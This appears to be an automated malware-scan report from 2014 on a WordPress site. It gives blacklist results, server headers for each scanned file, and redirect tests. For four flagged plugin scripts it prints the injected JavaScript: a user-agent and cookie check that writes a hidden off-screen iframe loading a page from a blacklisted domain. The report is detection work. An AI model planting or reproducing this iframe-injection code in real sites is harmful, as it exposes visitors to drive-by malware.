Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=asussv.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://asussv.ro/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://asussv.ro/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 20 Sep 2014 13:24:30 GMT Pragma: no-cache Location: http://www.asussv.ro/ Server: xServers Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=008e3fb85af8d480cffb39725636a16c; path=/ X-Cache: HIT from Backend X-Pingback: http://www.asussv.ro/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.asussv.ro/ | 200 OK Content-Length: 94971 Content-Type: text/html | clean |
http://www.asussv.ro/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-content/plugins/layersliderwp_v.5.1.1/static/js/layerslider.kreaturamedia.jquery.js?ver=5.1.1 | 200 OK Content-Length: 58064 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: mifiliter.riftenterprises.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date) ...[3257 bytes skipped]... Decoded script: ...[171035 bytes skipped]... optimizeForMobile:true,optimizeForIE78:true,cbInit:function(e){},cbStart:function(e){},cbStop:function(e){},cbPause:function(e){},cbAnimStart:function(e){},cbAnimStop:function(e){},cbPrev:function(e){},cbNext:function(e){},slideDelay:4e3,slideDirection:"right",parallaxIn:.45,parallaxOut:.45,durationIn:1e3,durationOut:1e3,easingIn:"easeInOutQuint",easingOut:"easeInOutQuint",delayIn:0,delayOut:0}})(jQuery) <iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://mifiliter.riftenterprises.com/fefagbubanle16.html This URL is marked by Google as suspicious <iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.asussv.ro/wp-content/plugins/layersliderwp_v.5.1.1/static/js/greensock.js?ver=1.11.2 | 200 OK Content-Length: 53359 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: mifiliter.riftenterprises.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date) ...[3260 bytes skipped]... Decoded script: ...[150276 bytes skipped]... , e !== true && (i = r(p)), t && f.dispatchEvent("tick"); } /*** called setTimeout with function (e) { C = N(), f.time = (C - l) / 1000; var t, s = f.time - a; (!n || s > 0 || e === true) && (f.frame++, a += s + (s >= u ? 0.004 : u - s), t = true), e !== true && (i = r(p)), t && f.dispatchEvent("tick"); }, 67 */ <iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://mifiliter.riftenterprises.com/fefagbubanle16.html This URL is marked by Google as suspicious <iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.asussv.ro/wp-content/plugins/layersliderwp_v.5.1.1/static/js/layerslider.transitions.js?ver=5.1.1 | 200 OK Content-Length: 22159 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: mifiliter.riftenterprises.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date) ...[3217 bytes skipped]... Decoded script: ...[100247 bytes skipped]... OutQuart",duration:400}},{name:"Scaling and vertical spinning columns random (180°, large depth)",rows:1,cols:[7,11],tile:{delay:65,sequence:"random",depth:"large"},before:{transition:{scale3d:.85},duration:600,easing:"easeOutBack"},animation:{transition:{rotateX:-180},easing:"easeInOutQuart",duration:1200,direction:"vertical"},after:{transition:{delay:200},easing:"easeOutQuart",duration:400}}]} <iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://mifiliter.riftenterprises.com/fefagbubanle16.html This URL is marked by Google as suspicious <iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.asussv.ro/wp-content/plugins/mini-popup/js/jquery.cookie.js?ver=4.0 | 200 OK Content-Length: 4793 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: mifiliter.riftenterprises.com function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe>');var r=new Date((new Date) ...[1414 bytes skipped]... Decoded script: <iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"></iframe> Malicious iFrame found. size: 205x205 src: http://mifiliter.riftenterprises.com/fefagbubanle16.html This URL is marked by Google as suspicious <iframe src="http://mifiliter.riftenterprises.com/fefagbubanle16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-left-color: hsl(120,60%,70%);border-left-width: 7px;border-radius: 7px;border-right-color: hsla(120,100%,50%,0.3);border-right-width: 6px;border-spacing: 5px 5px;border-top-color: hsla(120,100%,25%,0.3);border-top-style: dotted;border-top-width: 7px;top: -999px;" height="205" width="205"> | ||
http://www.asussv.ro/wp-content/themes/starmag/js/jquery.ui.totop.js?ver=1.1 | 200 OK Content-Length: 1738 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-content/themes/starmag/js/jquery.prettyPhoto.js?ver=4.0 | 200 OK Content-Length: 25626 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-content/themes/starmag/js/jquery.easing.1.3.js?ver=4.0 | 200 OK Content-Length: 8097 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-content/themes/starmag/js/jquery.cycle.all.js?ver=4.0 | 200 OK Content-Length: 89885 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-content/themes/starmag/js/google-code-prettify/prettify.js?ver=4.0 | 200 OK Content-Length: 13632 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-content/themes/starmag/js/bootstrap.min.js?ver=4.0 | 200 OK Content-Length: 28756 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-content/themes/starmag/js/application.js?ver=4.0 | 200 OK Content-Length: 4036 Content-Type: application/x-javascript | clean |
http://www.asussv.ro/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.15.0 | 200 OK Content-Length: 76276 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: asussv.ro
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 13:24:30 GMT
Pragma: no-cache
Location: http://www.asussv.ro/
Server: xServers
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=008e3fb85af8d480cffb39725636a16c; path=/
X-Cache: HIT from Backend
X-Pingback: http://www.asussv.ro/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: asussv.ro
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 13:24:30 GMT
Pragma: no-cache
Location: http://www.asussv.ro/
Server: xServers
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=008e3fb85af8d480cffb39725636a16c; path=/
X-Cache: HIT from Backend
X-Pingback: http://www.asussv.ro/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: asussv.ro
Referer: http://www.google.com/search?q=asussv.ro
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: asussv.ro
Referer: http://www.google.com/search?q=asussv.ro
Result:
The result is similar to the first query. There are no suspicious redirects found.